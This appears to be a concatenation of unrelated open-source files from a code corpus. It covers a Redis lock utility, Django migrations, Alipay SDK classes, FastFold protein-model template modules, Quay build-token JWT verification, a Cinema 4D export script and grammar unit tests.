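#   perm = numpy.array([2, 0, 1])
#   node = numpy.array([[1., 2., 3.]])     # (batch_size, num_node)
#   adj = numpy.ones((1, 3, 3))            # (batch_size, num_node, num_node)
#   node_p = permute_node(node, perm)      # [[3., 1., 2.]]
#   adj_p = permute_adj(adj, perm)         # still all ones, shape (1, 3, 3)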
|
gcloud/utils/redis_lock.py | DomineCore/bk-sops | 881 | 12687518 | # -*- coding: utf-8 -*-
"""
Tencent is pleased to support the open source community by making 蓝鲸智云PaaS平台社区版 (BlueKing PaaS Community
Edition) available.
Copyright (C) 2017-2020 THL A29 Limited, a Tencent company. All rights reserved.
Licensed under the MIT License (the "License"); you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://opensource.org/licenses/MIT
Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on
an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the
specific language governing permissions and limitations under the License.
"""
import time
from contextlib import contextmanager
from uuid import uuid4
from django.conf import settings
from redis.exceptions import LockError
MAX_RETRY = getattr(settings, "REDIS_LOCK_MAX_RETRY", None) or 500
@contextmanager
def redis_lock(redis_instance, key):
lock_key = "lock_{}".format(key)
lock_id = str(uuid4())
try:
lock_acquired = acquire_redis_lock(redis_instance, lock_key, lock_id)
err = (
None
if lock_acquired
else LockError(f"Unable to acquire redis lock in max tries, lock key: {lock_key}, lock_id: {lock_id}")
)
yield lock_acquired, err
finally:
release_redis_lock(redis_instance, lock_key, lock_id)
def acquire_redis_lock(redis_instance, lock_key, lock_id):
cnt = 1
while cnt < MAX_RETRY:
if redis_instance.set(lock_key, lock_id, ex=5, nx=True):
return True
cnt += 1
time.sleep(0.01)
return False
def release_redis_lock(redis_instance, lock_key, lock_id):
lock_value = redis_instance.get(lock_key)
    # Be compatible with redis clients that return bytes as well as those that return str
lock_value = lock_value.decode() if isinstance(lock_value, bytes) else lock_value
if lock_value == lock_id:
redis_instance.delete(lock_key)
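# Example (illustrative; the connection setup is an assumption):
#
#   import redis
#
#   client = redis.Redis()
#   with redis_lock(client, "periodic_task_42") as (acquired, err):
#       if not acquired:
#           raise err
#       ...  # critical section; at most one worker holds the lock at a time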
|
tests/python/py3implicitnamespace/namespace/sibling/__init__.py | sammorley-short/sphinx-autoapi | 197 | 12687529 | def first_method():
"""First sibling package method."""
return 1
def second_method():
"""Second sibling package method."""
return 2
|
numba/testing/__main__.py | auderson/numba | 6,620 | 12687596 | import sys
from numba.testing import run_tests
sys.exit(0 if run_tests(sys.argv).wasSuccessful() else 1)
|
src/pretalx/submission/migrations/0045_extend_question_help_text_length.py | lili668668/pretalx | 418 | 12687597 | <reponame>lili668668/pretalx
# Generated by Django 3.0.3 on 2020-03-01 19:25
from django.db import migrations
import i18nfield.fields
class Migration(migrations.Migration):
dependencies = [
("submission", "0044_submission_anonymised_data"),
]
operations = [
migrations.AlterField(
model_name="question",
name="help_text",
field=i18nfield.fields.I18nCharField(blank=True, max_length=800, null=True),
),
]
|
alipay/aop/api/domain/LawsuitPersonRecord.py | snowxmas/alipay-sdk-python-all | 213 | 12687620 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.constant.ParamConstants import *
from alipay.aop.api.domain.EpInfo import EpInfo
class LawsuitPersonRecord(object):
def __init__(self):
self._bgt_list = None
self._cpws_list = None
self._sxgg_list = None
self._zxgg_list = None
@property
def bgt_list(self):
return self._bgt_list
@bgt_list.setter
def bgt_list(self, value):
if isinstance(value, list):
self._bgt_list = list()
for i in value:
if isinstance(i, EpInfo):
self._bgt_list.append(i)
else:
self._bgt_list.append(EpInfo.from_alipay_dict(i))
@property
def cpws_list(self):
return self._cpws_list
@cpws_list.setter
def cpws_list(self, value):
if isinstance(value, list):
self._cpws_list = list()
for i in value:
if isinstance(i, EpInfo):
self._cpws_list.append(i)
else:
self._cpws_list.append(EpInfo.from_alipay_dict(i))
@property
def sxgg_list(self):
return self._sxgg_list
@sxgg_list.setter
def sxgg_list(self, value):
if isinstance(value, list):
self._sxgg_list = list()
for i in value:
if isinstance(i, EpInfo):
self._sxgg_list.append(i)
else:
self._sxgg_list.append(EpInfo.from_alipay_dict(i))
@property
def zxgg_list(self):
return self._zxgg_list
@zxgg_list.setter
def zxgg_list(self, value):
if isinstance(value, list):
self._zxgg_list = list()
for i in value:
if isinstance(i, EpInfo):
self._zxgg_list.append(i)
else:
self._zxgg_list.append(EpInfo.from_alipay_dict(i))
def to_alipay_dict(self):
params = dict()
if self.bgt_list:
if isinstance(self.bgt_list, list):
for i in range(0, len(self.bgt_list)):
element = self.bgt_list[i]
if hasattr(element, 'to_alipay_dict'):
self.bgt_list[i] = element.to_alipay_dict()
if hasattr(self.bgt_list, 'to_alipay_dict'):
params['bgt_list'] = self.bgt_list.to_alipay_dict()
else:
params['bgt_list'] = self.bgt_list
if self.cpws_list:
if isinstance(self.cpws_list, list):
for i in range(0, len(self.cpws_list)):
element = self.cpws_list[i]
if hasattr(element, 'to_alipay_dict'):
self.cpws_list[i] = element.to_alipay_dict()
if hasattr(self.cpws_list, 'to_alipay_dict'):
params['cpws_list'] = self.cpws_list.to_alipay_dict()
else:
params['cpws_list'] = self.cpws_list
if self.sxgg_list:
if isinstance(self.sxgg_list, list):
for i in range(0, len(self.sxgg_list)):
element = self.sxgg_list[i]
if hasattr(element, 'to_alipay_dict'):
self.sxgg_list[i] = element.to_alipay_dict()
if hasattr(self.sxgg_list, 'to_alipay_dict'):
params['sxgg_list'] = self.sxgg_list.to_alipay_dict()
else:
params['sxgg_list'] = self.sxgg_list
if self.zxgg_list:
if isinstance(self.zxgg_list, list):
for i in range(0, len(self.zxgg_list)):
element = self.zxgg_list[i]
if hasattr(element, 'to_alipay_dict'):
self.zxgg_list[i] = element.to_alipay_dict()
if hasattr(self.zxgg_list, 'to_alipay_dict'):
params['zxgg_list'] = self.zxgg_list.to_alipay_dict()
else:
params['zxgg_list'] = self.zxgg_list
return params
@staticmethod
def from_alipay_dict(d):
if not d:
return None
o = LawsuitPersonRecord()
if 'bgt_list' in d:
o.bgt_list = d['bgt_list']
if 'cpws_list' in d:
o.cpws_list = d['cpws_list']
if 'sxgg_list' in d:
o.sxgg_list = d['sxgg_list']
if 'zxgg_list' in d:
o.zxgg_list = d['zxgg_list']
return o
|
models/baseline_config.py | SonjaAits/MTL-Bioinformatics-2016 | 171 | 12687628 | class Defaults(object):
window_size = 7
hidden_sizes = [300]
hidden_activation = 'relu'
max_vocab_size = 1000000
optimizer = 'sgd' # 'adam'
learning_rate = 0.1 # 1e-4
epochs = 20
iobes = True # Map tags to IOBES on input
max_tokens = None # Max dataset size in tokens
encoding = 'utf-8' # Data encoding
output_drop_prob = 0.0 # Dropout probablility prior to output
token_level_eval = False # Force token-level evaluation
verbosity = 1 # 0=quiet, 1=progress bar, 2=one line per epoch
fixed_wordvecs = False # Don't fine-tune word vectors
word_features = True
batch_size = 50
viterbi = True
# Learning rate multiplier for embeddings. This is a tweak to
# implement faster learning for embeddings compared to other
# layers. As the feature is not yet implemented in Keras master
# (see https://github.com/fchollet/keras/pull/1991), this option
# currently requires the fork https://github.com/spyysalo/keras .
embedding_lr_multiplier = 1.0
|
firefly/management/commands/reloadmodule.py | genghaolove/firefly | 675 | 12687642 | #coding:utf8
'''
Created on 2013-8-12
@author: lan (www.9miao.com)
'''
import urllib,sys
def execute(*args):
"""
"""
if not args:
        masterport = 9998
else:
masterport = int(args[0])
url = "http://localhost:%s/reloadmodule"%masterport
try:
response = urllib.urlopen(url)
except:
response = None
if response:
sys.stdout.write("reload module success \n")
else:
sys.stdout.write("reload module failed \n") |
fastfold/model/nn/template.py | hpcaitech/FastFold | 303 | 12687654 | # Copyright 2021 AlQuraishi Laboratory
# Copyright 2021 DeepMind Technologies Limited
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from functools import partial
import math
from typing import Optional, List
import torch
import torch.nn as nn
from fastfold.model.nn.primitives import Linear, LayerNorm, Attention
from fastfold.model.nn.dropout import (
DropoutRowwise,
DropoutColumnwise,
)
from fastfold.model.nn.pair_transition import PairTransition
from fastfold.model.nn.triangular_attention import (
TriangleAttentionStartingNode,
TriangleAttentionEndingNode,
)
from fastfold.model.nn.triangular_multiplicative_update import (
TriangleMultiplicationOutgoing,
TriangleMultiplicationIncoming,
)
from fastfold.utils.checkpointing import checkpoint_blocks
from fastfold.utils.tensor_utils import (
chunk_layer,
permute_final_dims,
flatten_final_dims,
)
class TemplatePointwiseAttention(nn.Module):
"""
Implements Algorithm 17.
"""
def __init__(self, c_t, c_z, c_hidden, no_heads, inf, **kwargs):
"""
Args:
c_t:
Template embedding channel dimension
c_z:
Pair embedding channel dimension
c_hidden:
Hidden channel dimension
"""
super(TemplatePointwiseAttention, self).__init__()
self.c_t = c_t
self.c_z = c_z
self.c_hidden = c_hidden
self.no_heads = no_heads
self.inf = inf
self.mha = Attention(
self.c_z,
self.c_t,
self.c_t,
self.c_hidden,
self.no_heads,
gating=False,
)
def _chunk(self,
z: torch.Tensor,
t: torch.Tensor,
biases: List[torch.Tensor],
chunk_size: int,
) -> torch.Tensor:
mha_inputs = {
"q_x": z,
"kv_x": t,
"biases": biases,
}
return chunk_layer(
self.mha,
mha_inputs,
chunk_size=chunk_size,
no_batch_dims=len(z.shape[:-2]),
)
def forward(self,
t: torch.Tensor,
z: torch.Tensor,
template_mask: Optional[torch.Tensor] = None,
chunk_size: Optional[int] = None
) -> torch.Tensor:
"""
Args:
t:
[*, N_templ, N_res, N_res, C_t] template embedding
z:
[*, N_res, N_res, C_t] pair embedding
template_mask:
[*, N_templ] template mask
Returns:
[*, N_res, N_res, C_z] pair embedding update
"""
if template_mask is None:
template_mask = t.new_ones(t.shape[:-3])
bias = self.inf * (template_mask[..., None, None, None, None, :] - 1)
# [*, N_res, N_res, 1, C_z]
z = z.unsqueeze(-2)
# [*, N_res, N_res, N_temp, C_t]
t = permute_final_dims(t, (1, 2, 0, 3))
# [*, N_res, N_res, 1, C_z]
biases = [bias]
if chunk_size is not None:
z = self._chunk(z, t, biases, chunk_size)
else:
z = self.mha(q_x=z, kv_x=t, biases=biases)
# [*, N_res, N_res, C_z]
z = z.squeeze(-2)
return z
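# Example (illustrative shapes and hyper-parameters, not the production config):
#
#   tpa = TemplatePointwiseAttention(c_t=64, c_z=128, c_hidden=16, no_heads=4, inf=1e9)
#   t = torch.randn(1, 2, 16, 16, 64)   # [*, N_templ, N_res, N_res, C_t]
#   z = torch.randn(1, 16, 16, 128)     # [*, N_res, N_res, C_z]
#   z_update = tpa(t, z)                # [*, N_res, N_res, C_z]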
class TemplatePairStackBlock(nn.Module):
def __init__(
self,
c_t: int,
c_hidden_tri_att: int,
c_hidden_tri_mul: int,
no_heads: int,
pair_transition_n: int,
dropout_rate: float,
inf: float,
**kwargs,
):
super(TemplatePairStackBlock, self).__init__()
self.c_t = c_t
self.c_hidden_tri_att = c_hidden_tri_att
self.c_hidden_tri_mul = c_hidden_tri_mul
self.no_heads = no_heads
self.pair_transition_n = pair_transition_n
self.dropout_rate = dropout_rate
self.inf = inf
self.dropout_row = DropoutRowwise(self.dropout_rate)
self.dropout_col = DropoutColumnwise(self.dropout_rate)
self.tri_att_start = TriangleAttentionStartingNode(
self.c_t,
self.c_hidden_tri_att,
self.no_heads,
inf=inf,
)
self.tri_att_end = TriangleAttentionEndingNode(
self.c_t,
self.c_hidden_tri_att,
self.no_heads,
inf=inf,
)
self.tri_mul_out = TriangleMultiplicationOutgoing(
self.c_t,
self.c_hidden_tri_mul,
)
self.tri_mul_in = TriangleMultiplicationIncoming(
self.c_t,
self.c_hidden_tri_mul,
)
self.pair_transition = PairTransition(
self.c_t,
self.pair_transition_n,
)
def forward(self,
z: torch.Tensor,
mask: torch.Tensor,
chunk_size: Optional[int] = None,
_mask_trans: bool = True
):
single_templates = [
t.unsqueeze(-4) for t in torch.unbind(z, dim=-4)
]
single_templates_masks = [
m.unsqueeze(-3) for m in torch.unbind(mask, dim=-3)
]
for i in range(len(single_templates)):
single = single_templates[i]
single_mask = single_templates_masks[i]
single = single + self.dropout_row(
self.tri_att_start(
single,
chunk_size=chunk_size,
mask=single_mask
)
)
single = single + self.dropout_col(
self.tri_att_end(
single,
chunk_size=chunk_size,
mask=single_mask
)
)
single = single + self.dropout_row(
self.tri_mul_out(
single,
mask=single_mask
)
)
single = single + self.dropout_row(
self.tri_mul_in(
single,
mask=single_mask
)
)
single = single + self.pair_transition(
single,
mask=single_mask if _mask_trans else None,
chunk_size=chunk_size,
)
single_templates[i] = single
z = torch.cat(single_templates, dim=-4)
return z
class TemplatePairStack(nn.Module):
"""
Implements Algorithm 16.
"""
def __init__(
self,
c_t,
c_hidden_tri_att,
c_hidden_tri_mul,
no_blocks,
no_heads,
pair_transition_n,
dropout_rate,
blocks_per_ckpt,
inf=1e9,
**kwargs,
):
"""
Args:
c_t:
Template embedding channel dimension
c_hidden_tri_att:
Per-head hidden dimension for triangular attention
            c_hidden_tri_mul:
Hidden dimension for triangular multiplication
no_blocks:
Number of blocks in the stack
pair_transition_n:
Scale of pair transition (Alg. 15) hidden dimension
dropout_rate:
Dropout rate used throughout the stack
blocks_per_ckpt:
Number of blocks per activation checkpoint. None disables
activation checkpointing
"""
super(TemplatePairStack, self).__init__()
self.blocks_per_ckpt = blocks_per_ckpt
self.blocks = nn.ModuleList()
for _ in range(no_blocks):
block = TemplatePairStackBlock(
c_t=c_t,
c_hidden_tri_att=c_hidden_tri_att,
c_hidden_tri_mul=c_hidden_tri_mul,
no_heads=no_heads,
pair_transition_n=pair_transition_n,
dropout_rate=dropout_rate,
inf=inf,
)
self.blocks.append(block)
self.layer_norm = LayerNorm(c_t)
def forward(
self,
        t: torch.Tensor,
        mask: torch.Tensor,
chunk_size: int,
_mask_trans: bool = True,
):
"""
Args:
t:
[*, N_templ, N_res, N_res, C_t] template embedding
mask:
[*, N_templ, N_res, N_res] mask
Returns:
[*, N_templ, N_res, N_res, C_t] template embedding update
"""
if(mask.shape[-3] == 1):
expand_idx = list(mask.shape)
expand_idx[-3] = t.shape[-4]
mask = mask.expand(*expand_idx)
t, = checkpoint_blocks(
blocks=[
partial(
b,
mask=mask,
chunk_size=chunk_size,
_mask_trans=_mask_trans,
)
for b in self.blocks
],
args=(t,),
blocks_per_ckpt=self.blocks_per_ckpt if self.training else None,
)
t = self.layer_norm(t)
return t
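# Example (illustrative hyper-parameters; real values come from the model config):
#
#   stack = TemplatePairStack(
#       c_t=64, c_hidden_tri_att=16, c_hidden_tri_mul=64, no_blocks=2,
#       no_heads=4, pair_transition_n=2, dropout_rate=0.25, blocks_per_ckpt=None,
#   )
#   t = torch.randn(1, 2, 16, 16, 64)   # [*, N_templ, N_res, N_res, C_t]
#   mask = torch.ones(1, 2, 16, 16)     # [*, N_templ, N_res, N_res]
#   t = stack(t, mask, chunk_size=None) # same shape as the input embedding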
|
buildman/build_token.py | giuseppe/quay | 2,027 | 12687670 | <filename>buildman/build_token.py
import jsonschema
import jwt
import logging
from app import instance_keys
from util.security import jwtutil
from util.security.registry_jwt import (
generate_bearer_token,
InvalidBearerTokenException,
ALGORITHM,
JWT_CLOCK_SKEW_SECONDS,
)
logger = logging.getLogger(__name__)
ANONYMOUS_SUB = "(anonymous)"
BUILD_JOB_REGISTRATION_TYPE = "build_job_registration"
BUILD_JOB_TOKEN_TYPE = "build_job_token"
BUILD_TOKEN_CONTEXT_SCHEMA = {
"type": "object",
"description": "Build context",
"required": ["token_type", "build_id", "job_id", "expiration"],
"properties": {
"token_type": {
"type": "string",
"description": "The build token type",
},
"build_id": {
"type": "string",
"description": "The build id",
},
"job_id": {
"type": "string",
"description": "The job id",
},
"expiration": {
"type": "number",
"description": "The number of seconds until the job expires",
},
},
}
class InvalidBuildTokenException(Exception):
pass
def build_token(aud, token_type, build_id, job_id, expiration, instance_keys):
"""Returns an encoded JWT for the given build, signed by the local instance's private."""
token_data = {
"token_type": token_type,
"build_id": build_id,
"job_id": job_id,
"expiration": expiration,
}
token = generate_bearer_token(aud, ANONYMOUS_SUB, token_data, {}, expiration, instance_keys)
return token.decode("utf-8")
def verify_build_token(token, aud, token_type, instance_keys):
"""Verify the JWT build token."""
try:
headers = jwt.get_unverified_header(token)
except jwtutil.InvalidTokenError as ite:
logger.error("Invalid token reason: %s", ite)
raise InvalidBuildTokenException(ite)
kid = headers.get("kid", None)
if kid is None:
logger.error("Missing kid header on encoded JWT: %s", token)
raise InvalidBuildTokenException("Missing kid header")
public_key = instance_keys.get_service_key_public_key(kid)
if public_key is None:
logger.error("Could not find requested service key %s with encoded JWT: %s", kid, token)
raise InvalidBuildTokenException("Unknown service key")
try:
payload = jwtutil.decode(
token,
public_key,
verify=True,
algorithms=[ALGORITHM],
audience=aud,
issuer=instance_keys.service_name,
leeway=JWT_CLOCK_SKEW_SECONDS,
)
except jwtutil.InvalidTokenError as ite:
logger.error("Invalid token reason: %s", ite)
raise InvalidBuildTokenException(ite)
if "sub" not in payload:
raise InvalidBuildTokenException("Missing sub field in JWT")
if payload["sub"] != ANONYMOUS_SUB:
raise InvalidBuildTokenException("Wrong sub field in JWT")
if (
"context" not in payload
or not payload["context"]["token_type"]
or not payload["context"]["build_id"]
or not payload["context"]["job_id"]
or not payload["context"]["expiration"]
):
raise InvalidBuildTokenException("Missing context field in JWT")
try:
jsonschema.validate(payload["context"], BUILD_TOKEN_CONTEXT_SCHEMA)
except jsonschema.ValidationError:
raise InvalidBuildTokenException(
"Unable to validate build token context schema: malformed context"
)
if payload["context"]["token_type"] != token_type:
raise InvalidBuildTokenException(
"Build token type in JWT does not match expected type: %s" % token_type
)
return payload
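# Example (illustrative values; `instance_keys` is the application-wide object
# imported at the top of this module):
#
#   token = build_token(
#       aud="buildman.example.com",
#       token_type=BUILD_JOB_TOKEN_TYPE,
#       build_id="some-build-id",
#       job_id="some-job-id",
#       expiration=3600,
#       instance_keys=instance_keys,
#   )
#   payload = verify_build_token(
#       token, "buildman.example.com", BUILD_JOB_TOKEN_TYPE, instance_keys
#   )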
|
examples/plot/plot_wine.py | adekunleba/dabl | 500 | 12687703 | """
Wine Classification Dataset Visualization
==========================================
"""
# sphinx_gallery_thumbnail_number = 4
import matplotlib.pyplot as plt
from sklearn.datasets import load_wine
from dabl import plot
from dabl.utils import data_df_from_bunch
wine_bunch = load_wine()
wine_df = data_df_from_bunch(wine_bunch)
plot(wine_df, 'target')
plt.show()
|
data/4 - C4DPy/export_stdface.py | dot-by-dot-inc/KAMRA-Deja-Vu | 154 | 12687736 | from djv import *
#========================================
# config
faceObj = doc.SearchObject("face_original")
hullObj = doc.SearchObject("face_hull")
TRIANGLE = 0b0
QUAD = 0b1
FACE_UV = 0b100
FACE_VERTEX_UV = 0b1000
FACE_VERTEX_NORMAL = 0b100000
#========================================
def main():
#===================================
# face
points = faceObj.GetAllPoints()
facePoints = points[:eyemouthVertexIndex]
eyemouthPoints = points[eyemouthVertexIndex:]
polygons = faceObj.GetAllPolygons()
facePolygons = polygons[:eyemouthFaceIndex]
eyemouthPolygons = polygons[eyemouthFaceIndex:]
normals = faceObj.CreatePhongNormals()
faceNormals = normals[:eyemouthFaceIndex*3]
eyemouthNormals = normals[eyemouthFaceIndex*3:]
faceModel = getThreeJson(facePoints, facePolygons, faceNormals)
faceModel["name"] = "face"
with open("%s/0b/data/3 - JSON/face.json" % (projDir), 'w') as outFile:
json.dump(faceModel, outFile, separators=(',',':'))
#===================================
# eyemouth
for poly in eyemouthPolygons:
poly.a -= eyemouthVertexIndex
poly.b -= eyemouthVertexIndex
poly.c -= eyemouthVertexIndex
poly.d -= eyemouthVertexIndex
# fill mouth manually
mouthVertexOffset = len(eyemouthPoints)
eyemouthPoints.extend([points[i] for i in mouthVertexIndices])
print len(eyemouthPoints)
for poly in mouthPolygons:
cpoly = c4d.CPolygon(
poly[0] + mouthVertexOffset,
poly[2] + mouthVertexOffset,
poly[1] + mouthVertexOffset)
eyemouthPolygons.append(cpoly)
eyemouthModel = getThreeJson(eyemouthPoints, eyemouthPolygons, eyemouthNormals)
eyemouthModel["name"] = "eyemouth"
with open("%s/0b/data/3 - JSON/eyemouth.json" % (projDir), 'w') as outFile:
json.dump(eyemouthModel, outFile, separators=(',',':'))
#===================================
# face_hull
# points = hullObj.GetAllPoints()
# polygons = hullObj.GetAllPolygons()
# normals = hullObj.CreatePhongNormals()
# hullModel = getThreeJson(points, polygons, normals)
# hullModel["name"] = "face_hull"
# with open("%s/0b/data/3 - JSON/face_hull.json" % (projDir), 'w') as outFile:
# json.dump(hullModel, outFile, separators=(',',':'))
# print "END"
def getThreeJson(points, polygons, normals):
# face
normalsForIndex = [None for pt in points]
faceArray = []
for i, poly in enumerate(polygons):
faceArray.append(
# FACE_VERTEX_NORMAL |
TRIANGLE
)
if poly.IsTriangle():
faceArray.extend([poly.a, poly.c, poly.b])
faceArray.extend([poly.a, poly.c, poly.b])
# normalsForIndex[poly.a] = normals[i*3]
# normalsForIndex[poly.b] = normals[i*3+1]
# normalsForIndex[poly.c] = normals[i*3+2]
else:
print "ERROR", i
return
vertexArray = []
for pt in points:
pt = toFaceVertex(pt)
vertexArray.extend(pt)
# normals
# normalArray = []
# for norm in normalsForIndex:
# norm = toPosition(norm)
# normalArray.extend(norm)
return {
"metadata": {
"type": "Geometry",
"faces": len(polygons),
"vertices": len(points),
# "normals": len(points),
"generator": "io_three",
"version": 3
},
"vertices": vertexArray,
"faces": faceArray,
# "normals": normalArray
}
if __name__=='__main__':
main() |
aws_lambda_powertools/metrics/__init__.py | Sordie/aws-lambda-powertools-python | 1,208 | 12687744 | <gh_stars>1000+
"""CloudWatch Embedded Metric Format utility
"""
from .base import MetricUnit
from .exceptions import MetricUnitError, MetricValueError, SchemaValidationError
from .metric import single_metric
from .metrics import Metrics
__all__ = [
"Metrics",
"single_metric",
"MetricUnit",
"MetricUnitError",
"SchemaValidationError",
"MetricValueError",
]
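# Example (illustrative; mirrors the documented usage of these exports):
#
#   metrics = Metrics(namespace="ExampleApp", service="orders")
#
#   @metrics.log_metrics
#   def lambda_handler(event, context):
#       metrics.add_metric(name="OrdersCreated", unit=MetricUnit.Count, value=1)
#       return {"statusCode": 200}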
|
neural_guided_symbolic_regression/utils/arithmetic_grammar_test.py | deepneuralmachine/google-research | 23,901 | 12687748 | <reponame>deepneuralmachine/google-research
# coding=utf-8
# Copyright 2021 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for arithmetic_grammar."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from absl.testing import parameterized
import numpy as np
from six.moves import map
import tensorflow.compat.v1 as tf
from neural_guided_symbolic_regression.utils import arithmetic_grammar
class ReadGrammarFromFileTest(tf.test.TestCase):
def setUp(self):
super(ReadGrammarFromFileTest, self).setUp()
    # NLTK grammars use double quotes for production rules.
# pylint: disable=g-inconsistent-quotes
self.expected_set = set([
"S -> S '+' T",
"S -> S '-' T",
"S -> S '*' T",
"S -> S '/' T",
"S -> T",
"T -> '(' S ')'",
"T -> 'x'",
"T -> '1'",
])
# pylint: enable=g-inconsistent-quotes
def test_read_grammar_return_grammar(self):
grammar = arithmetic_grammar.read_grammar_from_file(
'third_party/google_research/google_research/'
'neural_guided_symbolic_regression/grammar/'
'univariate_one_constant_grammar.txt',
return_list=False)
production_rules_set = set(map(str, grammar.productions()))
self.assertEqual(production_rules_set, self.expected_set)
def test_read_grammar_return_list(self):
grammar = arithmetic_grammar.read_grammar_from_file(
'third_party/google_research/google_research/'
'neural_guided_symbolic_regression/grammar/'
'univariate_one_constant_grammar.txt',
return_list=True)
production_rules_set = set(map(str, grammar))
self.assertEqual(production_rules_set, self.expected_set)
class ArithmeticGrammarTest(parameterized.TestCase, tf.test.TestCase):
def test_input_grammar_rules_not_list(self):
with self.assertRaisesRegex(ValueError,
'The input grammar_rules should be list.'):
arithmetic_grammar.Grammar('foo')
def test_input_grammar_rules_not_unique(self):
with self.assertRaisesRegex(ValueError,
'The grammar production rules are not unique.'):
arithmetic_grammar.Grammar(['foo', 'foo'])
def test_input_grammar_rules_contain_padding_dummy_production_rule(self):
    # If a dummy production rule already exists in the input grammar rules, it
    # will collide with the dummy production rule appended by
    # arithmetic_grammar, so the rules are no longer unique.
with self.assertRaisesRegex(ValueError,
'The grammar production rules are not unique.'):
arithmetic_grammar.Grammar(['foo', 'Nothing -> None'])
def test_input_grammar_rules_not_change(self):
grammar_rules = ['S -> T', 'T -> "x"']
arithmetic_grammar.Grammar(grammar_rules)
self.assertListEqual(grammar_rules, ['S -> T', 'T -> "x"'])
def test_basic_production_rules(self):
grammar_rules = [
'S -> S "+" T',
'S -> T',
'T -> "(" S ")"',
'T -> "x"',
]
grammar = arithmetic_grammar.Grammar(grammar_rules)
self.assertLen(grammar.prod_rules, 5)
self.assertEqual(grammar.num_production_rules, 5)
self.assertEqual(grammar.padding_rule_index, 4)
self.assertEqual(grammar.start_index.symbol(), 'S')
self.assertEqual(str(grammar.start_rule), "S -> S '+' T")
self.assertEqual(grammar.unique_lhs, ['Nothing', 'S', 'T'])
self.assertEqual(grammar.num_unique_lhs, 3)
np.testing.assert_allclose(
grammar.masks,
[[0., 0., 0., 0., 1.], [1., 1., 0., 0., 0.], [0., 0., 1., 1., 0.]])
np.testing.assert_allclose(grammar.prod_rule_index_to_lhs_index,
[1, 1, 2, 2, 0])
self.assertEqual(grammar.prod_rule_rhs_indices, [[1, 2], [2], [1], [], []])
self.assertEqual(grammar.max_rhs_indices_size, 2)
def test_basic_production_rules_add_unique_production_rule_to_start(self):
grammar_rules = [
'S -> S "+" T',
'S -> T',
'T -> "(" S ")"',
'T -> "x"',
]
grammar = arithmetic_grammar.Grammar(
grammar_rules, add_unique_production_rule_to_start=True)
self.assertLen(grammar.prod_rules, 6)
self.assertEqual(grammar.num_production_rules, 6)
self.assertEqual(grammar.padding_rule_index, 5)
self.assertEqual(grammar.start_index.symbol(), 'O')
self.assertEqual(str(grammar.start_rule), 'O -> S')
self.assertEqual(grammar.unique_lhs, ['Nothing', 'O', 'S', 'T'])
self.assertEqual(grammar.num_unique_lhs, 4)
np.testing.assert_allclose(
grammar.masks,
[[0., 0., 0., 0., 0., 1.],
[1., 0., 0., 0., 0., 0.],
[0., 1., 1., 0., 0., 0.],
[0., 0., 0., 1., 1., 0.]])
np.testing.assert_allclose(grammar.prod_rule_index_to_lhs_index,
[1, 2, 2, 3, 3, 0])
self.assertEqual(grammar.prod_rule_rhs_indices,
[[2], [2, 3], [3], [2], [], []])
self.assertEqual(grammar.max_rhs_indices_size, 2)
def test_basic_production_rules_padding_at_end_false(self):
grammar_rules = [
'S -> S "+" T',
'S -> T',
'T -> "(" S ")"',
'T -> "x"',
]
grammar = arithmetic_grammar.Grammar(grammar_rules, padding_at_end=False)
self.assertLen(grammar.prod_rules, 5)
self.assertEqual(grammar.num_production_rules, 5)
self.assertEqual(grammar.padding_rule_index, 0)
self.assertEqual(grammar.start_index.symbol(), 'S')
self.assertEqual(str(grammar.start_rule), "S -> S '+' T")
self.assertEqual(grammar.unique_lhs, ['Nothing', 'S', 'T'])
self.assertEqual(grammar.num_unique_lhs, 3)
np.testing.assert_allclose(
grammar.masks,
[[1., 0., 0., 0., 0.], [0., 1., 1., 0., 0.], [0., 0., 0., 1., 1.]])
np.testing.assert_allclose(grammar.prod_rule_index_to_lhs_index,
[0, 1, 1, 2, 2])
self.assertEqual(grammar.prod_rule_rhs_indices, [[], [1, 2], [2], [1], []])
self.assertEqual(grammar.max_rhs_indices_size, 2)
@parameterized.parameters([
(True, True, "\t0: S -> T\n\t1: T -> 'x'\n\t2: Nothing -> None\n"),
(True, False, "0: S -> T\n1: T -> 'x'\n2: Nothing -> None\n"),
(False, True, "\t0: Nothing -> None\n\t1: S -> T\n\t2: T -> 'x'\n"),
(False, False, "0: Nothing -> None\n1: S -> T\n2: T -> 'x'\n"),
])
def test_grammar_to_string(self, padding_at_end, indent, expected_string):
grammar_rules = [
'S -> T',
'T -> "x"',
]
grammar = arithmetic_grammar.Grammar(
grammar_rules, padding_at_end=padding_at_end)
self.assertEqual(grammar.grammar_to_string(indent=indent), expected_string)
def test_invalid_grammar_string_no_space_before_arrow(self):
with self.assertRaisesRegex(ValueError, 'Unable to parse'):
# No space between arrow and left hand side symbol.
arithmetic_grammar.Grammar(['a-> b'])
def test_invalid_grammar_string_no_space_after_arrow(self):
# No space between arrow and right hand side symbol.
# This is a valid input and should not raise error.
arithmetic_grammar.Grammar(['a ->b'])
def test_invalid_grammar_string_no_arrow(self):
with self.assertRaisesRegex(ValueError, 'Unable to parse'):
# Invalid input with no arrow.
arithmetic_grammar.Grammar(['a b'])
def test_invalid_grammar_string_two_left_hand_side_symbols(self):
with self.assertRaisesRegex(ValueError, 'Unable to parse'):
# Invalid input with more than one left hand side symbol.
arithmetic_grammar.Grammar(['a b -> c'])
def test_invalid_grammar_string_no_left_hand_side_symbol(self):
with self.assertRaisesRegex(ValueError, 'Unable to parse'):
# Invalid input with no left hand side symbol.
arithmetic_grammar.Grammar([' -> c'])
